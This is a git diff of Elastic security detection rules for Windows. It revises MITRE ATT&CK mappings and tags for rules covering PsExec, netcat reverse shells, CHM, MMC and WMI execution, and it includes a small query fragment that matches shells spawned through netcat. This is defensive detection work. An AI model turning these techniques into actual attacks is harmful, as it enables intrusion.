name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/windows/execution_powershell_susp_args_via_winscript.toml b/rules/windows/execution_powershell_susp_args_via_winscript.toml index aae57571bac..f5e2c08a17b 100644 --- a/rules/windows/execution_powershell_susp_args_via_winscript.toml +++ b/rules/windows/execution_powershell_susp_args_via_winscript.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/09" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/19" [rule] author = ["Elastic"] @@ -105,12 +105,10 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -121,7 +119,15 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_psexec_lateral_movement_command.toml b/rules/windows/execution_psexec_lateral_movement_command.toml index fca2338e184..c567451cf8d 100644 --- a/rules/windows/execution_psexec_lateral_movement_command.toml +++ b/rules/windows/execution_psexec_lateral_movement_command.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -94,36 +94,41 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" - [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" - [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + + [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml index 24ce6afd747..d0f7e9bb2f1 100644 --- a/rules/windows/execution_register_server_program_connecting_to_the_internet.toml +++ b/rules/windows/execution_register_server_program_connecting_to_the_internet.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -109,7 +109,16 @@ references = ["https://www.iana.org/assignments/iana-ipv4-special-registry/iana- risk_score = 21 rule_id = "fb02b8d3-71ee-4af1-bacd-215d23f17efa" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", +] type = "eql" query = ''' @@ -133,11 +142,16 @@ sequence by process.entity_id [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.009" name = "Regsvcs/Regasm" @@ -148,7 +162,10 @@ id = "T1218.010" name = "Regsvr32" reference = "https://attack.mitre.org/techniques/T1218/010/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/execution_revshell_cmd_via_netcat.toml b/rules/windows/execution_revshell_cmd_via_netcat.toml index 1b531f5351e..2ca0d6e9e10 100644 --- a/rules/windows/execution_revshell_cmd_via_netcat.toml +++ b/rules/windows/execution_revshell_cmd_via_netcat.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/10/14" [rule] @@ -52,7 +52,14 @@ Attackers may abuse the NetCat utility to execute commands remotely using the bu risk_score = 73 rule_id = "9c0f61fa-abf4-4b11-8d9d-5978c09182dd" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Resources: Investigation Guide", + "Data Source: Elastic Defend" +] timestamp_override = "event.ingested" type = "eql" @@ -68,25 +75,10 @@ process.name : ("cmd.exe", "powershell.exe") and process.parent.args : "-e" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1095" -name = "Non-Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1095/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -97,7 +89,9 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_scheduled_task_powershell_source.toml b/rules/windows/execution_scheduled_task_powershell_source.toml index bd57bc91060..67a11ba82f0 100644 --- a/rules/windows/execution_scheduled_task_powershell_source.toml +++ b/rules/windows/execution_scheduled_task_powershell_source.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/06" [rule] author = ["Elastic"] @@ -61,7 +61,15 @@ references = [ risk_score = 47 rule_id = "5cd55388-a19c-47c7-8ec4-f41656c2fded" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -74,36 +82,29 @@ sequence by host.id, process.entity_id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" [[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + + [rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_scripting_remote_webdav.toml b/rules/windows/execution_scripting_remote_webdav.toml index b8228823b23..bce62a907c5 100644 --- a/rules/windows/execution_scripting_remote_webdav.toml +++ b/rules/windows/execution_scripting_remote_webdav.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/19" [rule] author = ["Elastic"] @@ -53,7 +53,20 @@ note = """## Triage and analysis risk_score = 73 rule_id = "ee7726cc-babc-4885-988c-f915173ac0c0" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -67,31 +80,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" reference = "https://attack.mitre.org/techniques/T1204/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" + + +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/windows/execution_scripts_archive_file.toml b/rules/windows/execution_scripts_archive_file.toml index c03b2b0d9f8..8bc7d0e44cc 100644 --- a/rules/windows/execution_scripts_archive_file.toml +++ b/rules/windows/execution_scripts_archive_file.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/20" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/20" [rule] @@ -104,27 +104,20 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.005" -name = "Visual Basic" -reference = "https://attack.mitre.org/techniques/T1059/005/" - [[rule.threat.technique.subtechnique]] id = "T1059.007" name = "JavaScript" reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - [[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + + diff --git a/rules/windows/execution_shared_modules_local_sxs_dll.toml b/rules/windows/execution_shared_modules_local_sxs_dll.toml index dfd8907197a..26b1f2df891 100644 --- a/rules/windows/execution_shared_modules_local_sxs_dll.toml +++ b/rules/windows/execution_shared_modules_local_sxs_dll.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/28" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -32,7 +32,19 @@ references = ["https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link- risk_score = 47 rule_id = "a3ea12f3-0d4e-4667-8b44-4230c63f3c75" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -48,18 +60,14 @@ file where host.os.type == "windows" and file.extension : "dll" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" -[[rule.threat.technique.subtechnique]] -id = "T1574.001" -name = "DLL" -reference = "https://attack.mitre.org/techniques/T1574/001/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/execution_suspicious_cmd_wmi.toml b/rules/windows/execution_suspicious_cmd_wmi.toml index 6d9476b2655..9f27f9612ae 100644 --- a/rules/windows/execution_suspicious_cmd_wmi.toml +++ b/rules/windows/execution_suspicious_cmd_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/19" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/05/20" [rule] author = ["Elastic"] @@ -67,7 +67,20 @@ references = [ risk_score = 73 rule_id = "12f07955-1674-44f7-86b5-c35da0a6f41a" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Tactic: Lateral Movement", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -81,7 +94,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -91,31 +103,15 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1021" -name = "Remote Services" -reference = "https://attack.mitre.org/techniques/T1021/" - -[[rule.threat.technique.subtechnique]] -id = "T1021.003" -name = "Distributed Component Object Model" -reference = "https://attack.mitre.org/techniques/T1021/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/windows/execution_suspicious_pdf_reader.toml b/rules/windows/execution_suspicious_pdf_reader.toml index 8a753362bf8..c816d82ecd2 100644 --- a/rules/windows/execution_suspicious_pdf_reader.toml +++ b/rules/windows/execution_suspicious_pdf_reader.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/30" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -76,7 +76,21 @@ This rule looks for commonly abused built-in utilities spawned by a PDF reader p risk_score = 21 rule_id = "53a26770-9cbd-40c5-8b57-61d01a325e14" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Initial Access", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -99,23 +113,31 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/execution_suspicious_psexesvc.toml b/rules/windows/execution_suspicious_psexesvc.toml index 63a8aefc8fc..6fcd26f682b 100644 --- a/rules/windows/execution_suspicious_psexesvc.toml +++ b/rules/windows/execution_suspicious_psexesvc.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/14" integration = ["endpoint", "windows", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -80,36 +80,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1569" +name = "System Services" +reference = "https://attack.mitre.org/techniques/T1569/" +[[rule.threat.technique.subtechnique]] +id = "T1569.002" +name = "Service Execution" +reference = "https://attack.mitre.org/techniques/T1569/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" - [[rule.threat.technique.subtechnique]] id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[[rule.threat.technique.subtechnique]] -id = "T1569.002" -name = "Service Execution" -reference = "https://attack.mitre.org/techniques/T1569/002/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/execution_via_compiled_html_file.toml b/rules/windows/execution_via_compiled_html_file.toml index ecb2bdda992..15d381da770 100644 --- a/rules/windows/execution_via_compiled_html_file.toml +++ b/rules/windows/execution_via_compiled_html_file.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [transform] [[transform.osquery]] @@ -119,7 +119,20 @@ When users double-click CHM files, the HTML Help executable program (`hh.exe`) w risk_score = 47 rule_id = "e3343ab9-4245-4715-b344-e11c56b0a47f" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Windows Security Event Logs", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -132,18 +145,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.001" name = "Compiled HTML File" reference = "https://attack.mitre.org/techniques/T1218/001/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/execution_via_hidden_shell_conhost.toml b/rules/windows/execution_via_hidden_shell_conhost.toml index c4713761847..df930dae4f7 100644 --- a/rules/windows/execution_via_hidden_shell_conhost.toml +++ b/rules/windows/execution_via_hidden_shell_conhost.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -76,7 +76,20 @@ references = [ risk_score = 73 rule_id = "05b358de-aa6d-4f6c-89e6-78f74018b43b" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", +] timestamp_override = "event.ingested" type = "eql" @@ -94,13 +107,38 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1055" -name = "Process Injection" -reference = "https://attack.mitre.org/techniques/T1055/" +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/execution_via_mmc_console_file_unusual_path.toml b/rules/windows/execution_via_mmc_console_file_unusual_path.toml index 2b997f4d88f..52678af5806 100644 --- a/rules/windows/execution_via_mmc_console_file_unusual_path.toml +++ b/rules/windows/execution_via_mmc_console_file_unusual_path.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/19" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = ["https://www.elastic.co/security-labs/grimresource"] risk_score = 47 rule_id = "7e23dfef-da2c-4d64-b11d-5f285b638853" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike", "Resources: Investigation Guide", "Data Source: Sysmon"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Windows Security Event Logs", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", + "Data Source: Sysmon", +] timestamp_override = "event.ingested" type = "eql" @@ -93,18 +106,41 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" + + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/execution_windows_cmd_shell_susp_args.toml b/rules/windows/execution_windows_cmd_shell_susp_args.toml index 7297fbfd210..9d8c461049c 100644 --- a/rules/windows/execution_windows_cmd_shell_susp_args.toml +++ b/rules/windows/execution_windows_cmd_shell_susp_args.toml @@ -2,7 +2,7 @@ creation_date = "2024/09/06" integration = ["windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/01" [rule] author = ["Elastic"] @@ -62,7 +62,19 @@ The Windows Command Shell (cmd.exe) is a critical component for executing comman risk_score = 73 rule_id = "d9ffc3d6-9de9-4b29-9395-5757d0695ecf" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Execution", "Resources: Investigation Guide", "Data 